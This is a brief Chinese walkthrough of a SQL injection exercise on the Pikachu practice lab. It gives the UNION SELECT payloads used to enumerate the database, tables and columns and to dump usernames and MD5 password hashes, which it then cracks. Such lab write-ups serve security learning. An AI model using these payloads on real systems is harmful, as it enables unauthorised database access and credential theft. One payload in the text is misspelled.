题目
上图可以看出所在url没有变化,猜测是GET请求方法
1.使用burpsuite进行抓包
在第10行可以看出数据的提交方式,将数据发送到重放器中
(1)确定字段数 id=1 order by [1,2,3....]
依次测试,验证数据库的字段数,可知字段数为2
(2)按照库->表->列的顺序,依次爆破
id=-1 union select 1,database() 发现库的名字是pikachu
输入id=-1 union select 1,table_name from information_schema.tables where table_schema='pikachu' ,存在名为users的表格
输入id=-1 union select 1,column_name from information_schema.columns where table_name='users 找到对应的列名
(3)最后根据得到的信息进行爆破即可
id=-1 unoin select username,password from users
将得到的密码进行MD5解码,得到123456,000000,abc123